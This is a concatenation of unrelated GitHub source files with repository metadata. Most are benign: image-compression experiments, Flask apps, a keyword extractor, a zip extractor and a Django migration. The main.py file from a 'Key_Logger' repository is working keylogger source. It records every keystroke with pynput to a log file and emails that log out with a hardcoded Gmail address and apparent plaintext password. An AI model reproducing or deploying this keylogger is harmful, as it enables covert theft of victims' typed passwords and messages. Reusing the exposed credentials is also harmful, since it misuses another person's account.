bffddf8b0f1b8d0b7b5e3f7db6384a95bbf3a8bb
|
6d11d48fb6d6ce45d2f9866f05310ae873a727dc
|
/code/run_exp.py
|
3b629b7a22b90091efb75193f2231d5ad0fd6f22
|
[
"MIT"
] |
permissive
|
BasemElbarashy/image-compression-and-semantic-segmentation
|
634b107154377d4ac1a41fba5777d21d6f8ad075
|
760d7f779e97659f3f8f59f68eaa4268ec08618b
|
refs/heads/master
| 2020-12-19T02:05:02.249473
| 2020-01-22T15:08:14
| 2020-01-22T15:08:14
| 235,588,116
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,944
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
from logging_formatter import Logger
import glob
import pickle
import tensorflow as tf
from bls2017 import train, compress, decompress, depth_train, depth_compress
import numpy as np
import shutil
import time
logger = Logger()
def run_exp(exp_args):
# create exp dir
expDir = os.path.join(exp_args.outdir, exp_args.exp_name)
lambdas = args.lambdas.split(',')
lambdas = [float(x) for x in lambdas]
if not os.path.exists(expDir):
os.makedirs(expDir)
logger.info('Creating experiment directory ' + expDir + '/')
else:
logger.info('Experiment directory already exist')
for lmbda in lambdas:
# for each lambda create subdir
train_dir = os.path.join(expDir, 'lambda_'+str(lmbda))
metrics_path = os.path.join(train_dir, 'metrics_args.pkl')
train_time_path = os.path.join(train_dir, 'time_analysis.txt')
exp_args.checkpoint_dir = train_dir
exp_args.lmbda = lmbda
if not exp_args.test_only:
if not os.path.exists(train_dir):
logger.info('Creating subdir in experiment directory for lambda = '+str(lmbda))
os.makedirs(train_dir)
logger.info('Saving a copy of the code used for running this experiment')
os.makedirs(os.path.join(train_dir,'code'))
code_files = os.listdir('examples/')
for code_file in code_files:
_, ext = os.path.splitext(code_file)
if ext == '.py' or ext =='.ipynb':
code_file = os.path.join('examples/', code_file)
shutil.copy(code_file, os.path.join(train_dir, 'code'))
else:
logger.warn('Trained with lambda= '+str(lmbda)+' before, skipping')
continue
try:
logger.info('Start training')
train_time_st = time.time()
if exp_args.depth:
depth_train(exp_args)
else:
train(exp_args)
tf.reset_default_graph()
train_time_secs = int(time.time() - train_time_st)
except Exception as e:
logger.error(str(e))
shutil.rmtree(train_dir)
raise
compressed_reconstructed_dir = os.path.join(train_dir, 'compressed_reconstructed_images')
os.makedirs(compressed_reconstructed_dir)
test_files= glob.glob(exp_args.test_glob)
test_files.sort()
test_files = test_files[ 0:min(exp_args.maxtestimgs, len(test_files))]
if exp_args.depth:
test_depth_files= glob.glob(exp_args.test_depth_glob)
test_depth_files.sort()
test_depth_files = test_depth_files[ 0:min(exp_args.maxtestimgs, len(test_depth_files))]
logger.info('Testing the model on '+str(len(test_files))+' images and save the reconstructed images')
msel, psnrl, msssiml, msssim_dbl, eval_bppl, bppl = [], [], [], [], [], []
test_time_st = time.time()
for i, test_file in enumerate(test_files):
test_file_name = os.path.splitext(os.path.split(test_file)[1])[0]
compressed_im_path = os.path.join(compressed_reconstructed_dir,test_file_name+'_compressed'+'.bin')
reconstucted_im_path = os.path.join(compressed_reconstructed_dir,test_file_name+'_reconstructed'+'.png')
im_metrics_path = os.path.join(compressed_reconstructed_dir,test_file_name+'_metrics'+'.pkl')
if exp_args.depth:
exp_args.input = (test_file, test_depth_files[i])
exp_args.output = compressed_im_path
mse, psnr, msssim, msssim_db, eval_bpp, bpp = depth_compress(exp_args)
else:
exp_args.input = test_file
exp_args.output = compressed_im_path
mse, psnr, msssim, msssim_db, eval_bpp, bpp = compress(exp_args)
im_metrics = {'mse':mse,'psnr':psnr, 'msssim':msssim,'msssim_db':msssim_db,'eval_bpp':eval_bpp,'bpp':bpp}
with open(im_metrics_path, "wb") as fp:
pickle.dump(im_metrics, fp)
msel.append(mse)
psnrl.append(psnr)
msssiml.append(msssim)
msssim_dbl.append(msssim_db)
eval_bppl.append(eval_bpp)
bppl.append(bpp)
tf.reset_default_graph()
exp_args.input = compressed_im_path
exp_args.output = reconstucted_im_path
decompress(exp_args)
tf.reset_default_graph()
test_time_secs = int(time.time() - test_time_st)
logger.info('Averaging metrics and save them with the exp_args in pickle file metrics_args.pkl' )
mse = np.mean(msel)
psnr = np.mean(psnrl)
msssim = np.mean(msssiml)
eval_bpp = np.mean(eval_bppl)
bpp = np.mean(bppl)
msssim_db = np.mean(msssim_dbl)
logger.info('MSE = '+str(mse))
logger.info('PSNR = '+str(psnr))
logger.info('MS-SSIM = '+str(msssim))
logger.info('MS-SSIM db = '+str(msssim_db))
logger.info('Eval_bpp = '+str(eval_bpp))
logger.info('bpp = '+str(bpp))
exp_avg_metrics = {'mse': mse, 'psnr': psnr, 'msssim': msssim,'msssim_db':msssim_db, 'eval_bpp': eval_bpp, 'bpp': bpp}
with open(metrics_path, "wb") as fp:
pickle.dump({'exp_avg_metrics': exp_avg_metrics, 'exp_args': exp_args}, fp)
if not exp_args.test_only:
time_analysis = {'training took (sec)':train_time_secs,'testing took (sec)': test_time_secs }
f = open(train_time_path, "w")
for k, v in time_analysis.items():
f.write(str(k) + ':' + str(v) + '\n')
f.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
"command", choices=["train", "compress", "decompress", "exp"],
help="What to do: 'train' loads training data and trains (or continues "
"to train) a new model. 'compress' reads an image file (lossless "
"PNG format) and writes a compressed binary file. 'decompress' "
"reads a binary file and reconstructs the image (in PNG format). "
"input and output filenames need to be provided for the latter "
"two options.")
parser.add_argument(
"input", nargs="?",
help="Input filename.")
parser.add_argument(
"output", nargs="?",
help="Output filename.")
parser.add_argument(
"--verbose", "-v", action="store_true",
help="Report bitrate and distortion when training or compressing.")
parser.add_argument(
"--num_filters", type=int, default=128,
help="Number of filters per layer.")
parser.add_argument(
"--checkpoint_dir", default="train",
help="Directory where to save/load model checkpoints.")
parser.add_argument(
"--train_glob", default="images/*.png",
help="Glob pattern identifying training data. This pattern must expand "
"to a list of RGB images in PNG format.")
parser.add_argument(
"--batchsize", type=int, default=8,
help="Batch size for training.")
parser.add_argument(
"--patchsize", type=int, default=256,
help="Size of image patches for training.")
parser.add_argument(
"--lambda", type=float, default=0.01, dest="lmbda",
help="Lambda for rate-distortion tradeoff.")
parser.add_argument(
"--last_step", type=int, default=1000000,
help="Train up to this number of steps.")
parser.add_argument(
"--preprocess_threads", type=int, default=16,
help="Number of CPU threads to use for parallel decoding of training "
"images.")
# -----------------------
parser.add_argument(
"--exp_name", type=str, default='exp',
help="Name of the exp directory")
parser.add_argument(
"--exp_description", type=str, default='',
help="details of model architecture used, dataset ...")
parser.add_argument(
"--lambdas", type=str, default='64,1024',
help="list of lambda values that the model will be trained with")
parser.add_argument(
"--test_glob", default='test_image/*.png',
help="Glob pattern identifying test data. This pattern must expand" )
parser.add_argument(
"--outdir", type=str, default='experiments/',
help="")
parser.add_argument(
"--gpu", type=str, default='0',
help="")
parser.add_argument(
"--maxtrainimgs", type=int, default=100000000,
help="")
parser.add_argument(
"--maxtestimgs", type=int, default=100000000,
help="")
parser.add_argument(
"--test_depth_glob", default='',
help="Glob pattern identifying test depth data. This pattern must expand" )
parser.add_argument(
"--train_depth_glob", default='',
help="Glob pattern identifying training depth data. This pattern must expand" )
parser.add_argument(
"--depth", "-d", action="store_true",
help="use depth data")
parser.add_argument(
"--test_only", "-t", action="store_true",
help="test the trained model")
args = parser.parse_args()
os.environ["CUDA_VISIBLE_DEVICES"] = args.gpu
if args.command == "train":
train(args)
elif args.command == "compress":
if args.input is None or args.output is None:
raise ValueError("Need input and output filename for compression.")
compress(args)
elif args.command == "decompress":
if args.input is None or args.output is None:
raise ValueError("Need input and output filename for decompression.")
decompress(args)
elif args.command == "exp":
run_exp(args)
|
[
"mllover1992@gmail.com"
] |
mllover1992@gmail.com
|
e0ce5752ad88708ef35d5a8042862cc05fb1057b
|
ddf896fb5487228d1f8d56f19d9e69425554b2aa
|
/main/utils/response_code.py
|
ff3a4e6dd0f37f17bad967a8a06f6991497219ea
|
[] |
no_license
|
quinn-lee/novalinks
|
caf057b60d721cecb92b526bde1647e5db7e658c
|
8bb45cdaff6bde61fe00e41924109fb48c36cbd5
|
refs/heads/main
| 2023-08-25T15:30:49.049926
| 2021-10-28T12:06:27
| 2021-10-28T12:06:27
| 352,111,500
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,232
|
py
|
# coding:utf-8
class RET:
OK = "0"
AUTHERROR = "2001"
DBERR = "4001"
NODATA = "4002"
DATAEXIST = "4003"
DATAERR = "4004"
SESSIONERR = "4101"
LOGINERR = "4102"
PARAMERR = "4103"
USERERR = "4104"
ROLEERR = "4105"
PWDERR = "4106"
REQERR = "4201"
IPERR = "4202"
THIRDERR = "4301"
IOERR = "4302"
SERVERERR = "4500"
UNKOWNERR = "4501"
NOTJSON = "4600"
NOTXML = "4601"
error_map = {
RET.OK: u"成功",
RET.AUTHERROR: u"权限验证失败",
RET.DBERR: u"数据库查询错误",
RET.NODATA: u"无数据",
RET.DATAEXIST: u"数据已存在",
RET.DATAERR: u"数据错误",
RET.SESSIONERR: u"用户未登录",
RET.LOGINERR: u"用户登录失败",
RET.PARAMERR: u"参数错误",
RET.USERERR: u"用户不存在或未激活",
RET.ROLEERR: u"用户身份错误",
RET.PWDERR: u"密码错误",
RET.REQERR: u"非法请求或请求次数受限",
RET.IPERR: u"IP受限",
RET.THIRDERR: u"第三方系统错误",
RET.IOERR: u"文件读写错误",
RET.SERVERERR: u"内部错误",
RET.UNKOWNERR: u"未知错误",
RET.NOTJSON: u"请求非Json格式"
}
|
[
"lifuyuan33@gmail.com"
] |
lifuyuan33@gmail.com
|
aad30ae2f499a4fe38ffa603bb96df94f9fd7b53
|
be2ed81c9c35a7095c90addc9285a8d56d233ce7
|
/src/Item.py
|
61e0a114693edbd2fc072368225f0e229c22372d
|
[] |
no_license
|
AustinBCole/Intro-Python-II
|
ea4696d9caec6a954ba496c54ea3a528db883a90
|
130ab3172ea13f468fbada5023c44b78ddd5a5a0
|
refs/heads/master
| 2020-05-29T17:48:43.152760
| 2019-05-30T23:31:01
| 2019-05-30T23:31:01
| 189,284,228
| 1
| 0
| null | 2019-05-29T19:13:46
| 2019-05-29T19:13:45
| null |
UTF-8
|
Python
| false
| false
| 1,027
|
py
|
# This is the file for the Item class and other Item subclasses. Each Item will include at least a name and description.
class Item:
def __init__(self, name, description, point_value):
self.name = name
self.description = description
self.point_value = point_value
def on_take(self):
print(f"You have picked up the {self.name}.")
def on_drop(self):
print(f"You have dropped the {self.name}.")
class PuzzleItem(Item):
def __init__(self, name, description, point_value, puzzle_solved = False):
super().__init__(name, description, point_value)
class Treasure(Item):
def __init__(self, name, description, point_value):
super().__init__(name, description, point_value)
class LightSource(Item):
def __init__(self, name, description, point_value):
super().__init__(name, description, point_value)
def on_drop(self):
print("\nIt is not wise to drop your source of light!\n")
print(f"You have dropped the {self.name}.\n")
|
[
"austin.cole.chileno@gmail.com"
] |
austin.cole.chileno@gmail.com
|
0e863e8888aa0fe019d8daa53d295348ed7b230f
|
ce8a9e0d9d049d223e11924ab94b761560c091d1
|
/main.py
|
1c437615f87ebe588ffcce2e502879626e7a1345
|
[] |
no_license
|
ZeinShehab/Key_Logger
|
e9b4d5f845d47d38311b0d85dbaa4de645f99864
|
73a41fcf62b2262965fd2ff34fd829855eba421d
|
refs/heads/master
| 2023-01-01T09:47:51.025702
| 2020-10-21T09:31:27
| 2020-10-21T09:31:27
| 305,974,058
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,332
|
py
|
from pynput.keyboard import Key, Listener
from mail import SendMessage
import datetime
import time
count = 0
keys = []
def on_press(key):
global count, keys
count += 1
keys.append(key)
print('{} pressed'.format(key))
if count >= 1:
count = 0
write_file(keys)
keys = []
def write_file(keys):
with open('log.txt', 'a') as f:
for key in keys:
k = str(key).replace("'", "")
if k.find('space') > 0:
f.write(" ")
elif k.find('enter') > 0:
f.write("\n")
elif k.find('Key') == -1:
f.write(k)
def on_release(key):
if key == Key.insert:
send_log()
print('\n[!] Shutting down...')
time.sleep(1.5)
return False
def clear():
file = open("log.txt", 'w')
file.truncate(0)
file.close()
def send_log():
print('\n[+] Sending log...')
message = SendMessage('logsender12@gmail.com','gyk742des')
message.subject('Key Logger log')
message.body('This is the data recorded by the key logger on {}'.format(datetime.datetime.now()))
message.attach('log.txt', 'log.txt')
message.send_mail('logreceiver12@gmail.com')
clear()
with Listener(on_press=on_press, on_release=on_release) as listener:
listener.join()
|
[
"zeinshehab@outlook.com"
] |
zeinshehab@outlook.com
|
48cabdc9e9790d4b88e8a489a10a4d9f616671c7
|
02d7676fbe35cc20ab16ee0fc323af88aa6fdbb2
|
/zip_extractor.py
|
1fd75e97bb0123585bd52ac5b8852a55db2e1db6
|
[] |
no_license
|
Constin-Joseph/ZIP_EXTRACTOR_AND_EXTRACT_INTO_SAME_ZIP_FOLDER_NAME
|
91a058f1859134b8263c7983aa42172be6b7c17e
|
93e16908e57544c41f8216975cef5fa84e9f88af
|
refs/heads/master
| 2020-09-12T12:35:06.904073
| 2019-11-18T11:24:21
| 2019-11-18T11:24:21
| 222,427,353
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 408
|
py
|
import os
import glob
import zipfile
def extractor(b,c):
dir_name_base = b
dir_name_base1=c
for arc_name in glob.iglob(os.path.join(dir_name_base, "*.zip")):
arc_dir_name = os.path.splitext(os.path.basename(arc_name))[0]
zf = zipfile.ZipFile(arc_name)
zf.extractall(path=os.path.join(dir_name_base1, arc_dir_name))
zf.close()
extractor(path1,path2)
|
[
"noreply@github.com"
] |
Constin-Joseph.noreply@github.com
|
5e69c64504234a60e30d75476b388929c83fef33
|
95c4bb5c168f6afd3b833c1dce79a367b59f5fd7
|
/matrices y listas/sin duplicados.py
|
897a4e3a1a7ddc39f5d86909d24905338264684d
|
[] |
no_license
|
MikeDev0X/PythonPracticeEcercises
|
2abced3bda9e43a7b5e41decc3d3472f5df3f52a
|
c44dc15e691b65f58d0c50dffa093c22d73d2d69
|
refs/heads/master
| 2023-06-12T11:11:19.925477
| 2021-07-01T22:09:34
| 2021-07-01T22:09:34
| 382,172,280
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 450
|
py
|
'''Miguel Jiménez Padilla
Sin duplicados'''
def sinDup():
elem=int(input())
if elem>0:
lista=[]
num=''
for i in range (0,elem):
num=input()
lista.append(num)
newlist=[]
for x in lista:
if not x in newlist:
newlist.append(x)
print(lista)
print(newlist)
else:
print('Error')
sinDup()
|
[
"mike0vortex@gmail.com"
] |
mike0vortex@gmail.com
|
973632a7c8683bfc4870158b7ba92ba76228c912
|
7eed980f0bbc4a8ec98ca1e90365ef93c3f66ce9
|
/spiders/RAKE/rake.py
|
546e77bc3994fc3751a681f9580442df15b126c2
|
[
"MIT"
] |
permissive
|
Sevenforty740/ZHIKU
|
185c0b004f8a6fcaeb195fae9fbc983bfdfa8fa1
|
5b25c58358f9247797d8a7a094cdaff841ed1fc0
|
refs/heads/master
| 2022-11-15T16:35:08.960080
| 2020-07-11T02:15:06
| 2020-07-11T02:15:06
| 278,771,350
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,457
|
py
|
# Implementation of RAKE - Rapid Automtic Keyword Exraction algorithm
# as described in:
# Rose, S., D. Engel, N. Cramer, and W. Cowley (2010).
# Automatic keyword extraction from indi-vidual documents.
# In M. W. Berry and J. Kogan (Eds.), Text Mining: Applications and Theory.unknown: John Wiley and Sons, Ltd.
import re
import operator
debug = False
test = False
def is_number(s):
try:
float(s) if '.' in s else int(s)
return True
except ValueError:
return False
def load_stop_words(stop_word_file):
"""
Utility function to load stop words from a file and return as a list of words
@param stop_word_file Path and file name of a file containing stop words.
@return list A list of stop words.
"""
stop_words = []
for line in open(stop_word_file):
if line.strip()[0:1] != "#":
for word in line.split(): # in case more than one per line
stop_words.append(word)
return stop_words
def separate_words(text, min_word_return_size):
"""
Utility function to return a list of all words that are have a length greater than a specified number of characters.
@param text The text that must be split in to words.
@param min_word_return_size The minimum no of characters a word must have to be included.
"""
splitter = re.compile('[^a-zA-Z0-9_\\+\\-/]')
words = []
for single_word in splitter.split(text):
current_word = single_word.strip().lower()
#leave numbers in phrase, but don't count as words, since they tend to invalidate scores of their phrases
if len(current_word) > min_word_return_size and current_word != '' and not is_number(current_word):
words.append(current_word)
return words
def split_sentences(text):
"""
Utility function to return a list of sentences.
@param text The text that must be split in to sentences.
"""
sentence_delimiters = re.compile(u'[.!?,;:\t\\\\"\\(\\)\\\'\u2019\u2013]|\\s\\-\\s')
sentences = sentence_delimiters.split(text)
return sentences
def build_stop_word_regex(stop_word_file_path):
stop_word_list = load_stop_words(stop_word_file_path)
stop_word_regex_list = []
for word in stop_word_list:
word_regex = r'\b' + word + r'(?![\w-])' # added look ahead for hyphen
stop_word_regex_list.append(word_regex)
stop_word_pattern = re.compile('|'.join(stop_word_regex_list), re.IGNORECASE)
return stop_word_pattern
def generate_candidate_keywords(sentence_list, stopword_pattern):
phrase_list = []
for s in sentence_list:
tmp = re.sub(stopword_pattern, '|', s.strip())
phrases = tmp.split("|")
for phrase in phrases:
phrase = phrase.strip().lower()
if phrase != "":
phrase_list.append(phrase)
return phrase_list
def calculate_word_scores(phraseList):
word_frequency = {}
word_degree = {}
for phrase in phraseList:
word_list = separate_words(phrase, 0)
word_list_length = len(word_list)
word_list_degree = word_list_length - 1
#if word_list_degree > 3: word_list_degree = 3 #exp.
for word in word_list:
word_frequency.setdefault(word, 0)
word_frequency[word] += 1
word_degree.setdefault(word, 0)
word_degree[word] += word_list_degree #orig.
#word_degree[word] += 1/(word_list_length*1.0) #exp.
for item in word_frequency:
word_degree[item] = word_degree[item] + word_frequency[item]
# Calculate Word scores = deg(w)/frew(w)
word_score = {}
for item in word_frequency:
word_score.setdefault(item, 0)
word_score[item] = word_degree[item] / (word_frequency[item] * 1.0) #orig.
#word_score[item] = word_frequency[item]/(word_degree[item] * 1.0) #exp.
return word_score
def generate_candidate_keyword_scores(phrase_list, word_score):
keyword_candidates = {}
for phrase in phrase_list:
keyword_candidates.setdefault(phrase, 0)
word_list = separate_words(phrase, 0)
candidate_score = 0
for word in word_list:
candidate_score += word_score[word]
keyword_candidates[phrase] = candidate_score
return keyword_candidates
class Rake(object):
def __init__(self, stop_words_path):
self.stop_words_path = stop_words_path
self.__stop_words_pattern = build_stop_word_regex(stop_words_path)
def run(self, text):
sentence_list = split_sentences(text)
phrase_list = generate_candidate_keywords(sentence_list, self.__stop_words_pattern)
word_scores = calculate_word_scores(phrase_list)
keyword_candidates = generate_candidate_keyword_scores(phrase_list, word_scores)
sorted_keywords = sorted(keyword_candidates.items(), key=operator.itemgetter(1), reverse=True)
return sorted_keywords
if test:
text = """
Orlando cops have given up using Amazon’s controversial cloud-based facial recognition to monitor CCTV cameras dotted around the Florida city – after a nightmare year of technical breakdowns.
The decision came after officers attempted and failed to tap into Amazon’s Rekognition API, which they hoped would automatically flag up suspected criminals in streams of live surveillance camera footage. After 15 fruitless months of trying to get the thing working properly, with help from Amazon's staffers, the US city's police force cancelled its contract with the web giant.
"We haven't even established a stream today," the city’s chief information officer Rosa Akhtarkhavari told the Orlando Weekly on Thursday. "We're talking about more than a year later. We have not, today, established a reliable stream."
The plod wanted to feed photos of suspected or known crooks into Amazon Web Services' Rekognition API, and have the backend software automatically search live streams of CCTV footage for occurrences of those faces in real time, allowing officers to know immediately the whereabouts of persons of interest. Amazon techies had apparently visited the city numerous times to work with the police to get the system to work properly.
"""
# Split text into sentences
sentenceList = split_sentences(text)
#stoppath = "FoxStoplist.txt" #Fox stoplist contains "numbers", so it will not find "natural numbers" like in Table 1.1
stoppath = "SmartStoplist.txt" #SMART stoplist misses some of the lower-scoring keywords in Figure 1.5, which means that the top 1/3 cuts off one of the 4.0 score words in Table 1.1
stopwordpattern = build_stop_word_regex(stoppath)
# generate candidate keywords
phraseList = generate_candidate_keywords(sentenceList, stopwordpattern)
# calculate individual word scores
wordscores = calculate_word_scores(phraseList)
# generate candidate keyword scores
keywordcandidates = generate_candidate_keyword_scores(phraseList, wordscores)
if debug:
print(keywordcandidates)
sortedKeywords = sorted(keywordcandidates.items(), key=operator.itemgetter(1), reverse=True)
if debug:
print(sortedKeywords)
totalKeywords = len(sortedKeywords)
if debug:
print(totalKeywords)
print(sortedKeywords[0:int(totalKeywords / 3)])
print('---------------------------------------------------------')
rake = Rake("SmartStoplist.txt")
keywords = rake.run(text)
print(keywords)
|
[
"125045209@qq.com"
] |
125045209@qq.com
|
081beb03c48dbdcbc41bbeb2a87431355a67be1f
|
550207ff24c3afaa3f98aa0fd505231121daf210
|
/Hello_World.py
|
a698d6eefe397558cddd0b0686065531a2d70a28
|
[] |
no_license
|
uakin95/Deneme
|
46090d7fe181b08b76fca83d7336c81f779109bd
|
93b6758b8f9e139b89c10313254d9f4e1dff4d0e
|
refs/heads/main
| 2023-06-10T23:41:08.847464
| 2021-07-04T10:22:02
| 2021-07-04T10:22:02
| 382,816,181
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 61
|
py
|
print("Hello World")
# I made a change
#Yeni bir değişiklik
|
[
"utkuakin95@gmail.com"
] |
utkuakin95@gmail.com
|
2e9b77089880079fdb7d199d0b91502703b5d26f
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_206/788.py
|
e8b84134907f46ad0cbe2712afd5aa1543611f5d
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 823
|
py
|
# coding: utf-8
# In[2]:
import numpy as np
import itertools as it
import collections as col
# In[3]:
import sys
sys.setrecursionlimit(10000)
# In[4]:
import networkx as nx
import matplotlib.pyplot as plt
# In[1]:
def solve(*args):
print(args)
# In[16]:
def solve(D,N,Horses):
t = [float(D - x[0]) / x[1] for x in Horses]
sp = max(t)
return D/sp
# In[ ]:
print(solve(5,5))
# In[18]:
path = r'C:\Users\Shachar\Downloads\A-small-attempt0.in'
with open(path, 'r') as f, open(path[:-2]+'out', 'w') as outf:
T = int(f.readline())
for test_index in range(T):
D,N = [int(x) for x in f.readline().strip().split()]
Horses = [ [int(x) for x in f.readline().strip().split()] for _ in range(N)]
outf.write('Case #{}: {}\n'.format(test_index+1, solve(D,N,Horses)))
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
2ad7507ea1d4e5d99a5df93103dbc4567a8bc550
|
79e222e5ffae7f6eac61bcf58db8bc297f3448cd
|
/testing/conftest.py
|
8f54f6687ee1e88f9fd36a4957511dbc1ba52615
|
[] |
no_license
|
jhannah01/redisent
|
6642d2dbe6c04434acf37407a3d95d4fec80ee48
|
b31d724b47cccd688523f224b537e14c2435e124
|
refs/heads/master
| 2023-07-30T19:04:55.200616
| 2021-02-02T02:03:11
| 2021-02-02T02:03:11
| 332,575,184
| 1
| 0
| null | 2021-02-02T02:03:12
| 2021-01-24T22:59:23
|
Python
|
UTF-8
|
Python
| false
| false
| 396
|
py
|
import pytest
import aioredis
import fakeredis
import fakeredis.aioredis
import redis
pytestmark = [pytest.mark.asyncio]
@pytest.fixture()
def use_fake_aioredis(mocker):
mocker.patch.object(aioredis, 'ConnectionsPool', new=fakeredis.aioredis.FakeConnectionsPool)
@pytest.fixture()
def use_fake_redis(mocker):
mocker.patch.object(redis, 'StrictRedis', new=fakeredis.FakeStrictRedis)
|
[
"jon@synistree.com"
] |
jon@synistree.com
|
a9e934b9717261455daf003af05bd1a4579c86ae
|
9231713f6fd5a45baafa42a00bba5c36b11168bb
|
/search1/venv/Scripts/easy_install-3.7-script.py
|
cf100cbf5f55ab6f80e1c7d439f2554332ee01f5
|
[] |
no_license
|
Bizzle917/CourseDiscussion
|
095c0593d33f5db09b4db0f3a05da8fcef6cf302
|
7369696ef6a02f94730e086ea8320efb1f5baeec
|
refs/heads/master
| 2022-06-23T21:36:42.322950
| 2020-05-04T04:06:10
| 2020-05-04T04:06:10
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 430
|
py
|
#!D:\search1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.7'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.7')()
)
|
[
"1599101385@qq.com"
] |
1599101385@qq.com
|
fc059d9841f05ab00deea0b42b02c3bf9c5b672a
|
f7de679c65e07a83aa39bc8e9d5aeac505b566f3
|
/08_mongo/app.py
|
ff4204bddc97ef6c163adaf3a09e7e72146487b4
|
[] |
no_license
|
DenChen11214/softdev7
|
2fed8cff212b2e47f5f2d0c860a3827b7b023526
|
40f73f5251f32a019b9d05cfdf8a70adac10689a
|
refs/heads/master
| 2020-04-19T12:51:06.292044
| 2019-05-02T17:12:26
| 2019-05-02T17:12:26
| 168,202,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,721
|
py
|
#TangoTangoMangoMongo:Dennis Chen, Robin Han, Imad Belkebeer
#SoftDev pd7
#K#08: Ay Mon, Go Git It From Yer Flask
#3/6/19
from flask import Flask, redirect, url_for, render_template, session, request
import pymongo
import os
import json
import mongo
app = Flask(__name__)
app.secret_key = os.urandom(32)
collection = None
@app.route('/')
def home():
return render_template('main.html')
@app.route('/display', methods = ["GET","POST"])
def display():
SERVER_ADDR = request.form['serverid']
global collection
connection = mongo.connect(SERVER_ADDR)
collection = mongo.importDB(SERVER_ADDR)
return render_template("newpage.html")
@app.route('/getSenP', methods = ["POST"])
def senParty():
party = request.form['party']
print(collection)
people = mongo.get_senators_from_party(party)
return render_template("newpage.html",info = people)
@app.route('/getSenI', methods = ["POST"])
def senInfo():
name = request.form["name"]
info = mongo.get_senator_info(name)
return render_template("newpage.html",info = info)
@app.route('/getConI', methods = ["POST"])
def senContact():
name = request.form["name"]
contact = mongo.get_contact_info(name)
return render_template("newpage.html",info = contact)
@app.route('/getSMI', methods = ["POST"])
def senSocial():
name = request.form["name"]
info = mongo.get_social_media_info(name)
return render_template("newpage.html",info = info)
@app.route('/getSenS', methods = ["POST"])
def senState():
state = request.form["State"]
senators = mongo.get_senators_from_state(state)
return render_template("newpage.html",info = senators)
if __name__ == "__main__":
app.debug = True
app.run()
|
[
"dchen22@stuy.edu"
] |
dchen22@stuy.edu
|
e79dd2ca53fdbbfde74fe854d3bbab50baefb268
|
850fa06b63bf259d54adecc30644371691505484
|
/app/migrations/0001_initial.py
|
15fd27323995daa7edea7d9caa30d1dd3a3be3fb
|
[] |
no_license
|
pkfkzk/djangopython
|
534f165d1e9601cafd4914f3e809d7dcbe2550cb
|
91ac58cb1f60527cbd3e166bf7bdf1c5d2f165c0
|
refs/heads/master
| 2022-05-01T05:37:14.898214
| 2019-06-25T21:26:18
| 2019-06-25T21:26:18
| 193,785,164
| 0
| 0
| null | 2022-04-22T21:43:57
| 2019-06-25T21:22:28
|
Python
|
UTF-8
|
Python
| false
| false
| 1,629
|
py
|
# Generated by Django 2.2.2 on 2019-06-25 14:41
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=45)),
('username', models.CharField(max_length=255)),
('password', models.CharField(max_length=255)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Trip',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('destination', models.CharField(max_length=45)),
('description', models.CharField(max_length=255)),
('travelDateFrom', models.DateTimeField()),
('travelDateTo', models.DateTimeField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('jointrip', models.ManyToManyField(related_name='triptogether', to='app.User')),
('planned_By', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='trips', to='app.User')),
],
),
]
|
[
"pkfkzk@gmail.com"
] |
pkfkzk@gmail.com
|
2bc572186c70d43c31af48afcccdbafa462dd928
|
334a7ef4d295033bacdcf5573a9ff50d94bb7353
|
/basic-form-validation/server.py
|
4d86f8e401c4de96bb8e49e463e3b1ab32148de9
|
[] |
no_license
|
cd-chicago-june-cohort/flask-fundamentals-john
|
75a5b6350bf2d8ad96bf0feb8950246df17b7755
|
5c778b2a6b816bd15ef5ce375becb91519475024
|
refs/heads/master
| 2020-12-02T17:58:27.170244
| 2017-07-10T02:24:12
| 2017-07-10T02:24:12
| 96,456,342
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 478
|
py
|
from flask import Flask, render_template, redirect, request, session, flash
app = Flask(__name__)
app.secret_key = 'KeepItSecretKeepItSafe'
@app.route('/')
def index():
return render_template('index.html')
@app.route('/process', methods=['Post'])
def process():
if len(request.form["name"]) < 1:
flash("Name cannot be empty!")
else:
flash("Success! Your name is {}.".format(request.form["name"]))
return redirect('/')
app.run(debug=True)
|
[
"jpdoherty90@gmail.com"
] |
jpdoherty90@gmail.com
|
